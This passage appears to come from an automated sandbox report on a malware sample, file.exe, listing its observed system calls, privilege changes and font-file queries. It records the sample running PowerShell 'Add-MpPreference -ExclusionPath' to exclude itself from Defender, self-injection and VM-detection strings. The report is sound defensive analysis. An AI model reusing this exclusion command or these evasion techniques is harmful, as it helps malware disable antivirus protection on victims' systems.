            Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,3_2_00403D74
            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 60000Jump to behavior
            Source: file.exe, 00000000.00000002.1890192784.00000000008B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\R
            Source: file.exe, 00000003.00000002.3131214970.0000000001158000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0040317B mov eax, dword ptr fs:[00000030h]3_2_0040317B
            Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00402B7C GetProcessHeap,RtlAllocateHeap,3_2_00402B7C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe"
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe"Jump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe"Jump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"Jump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
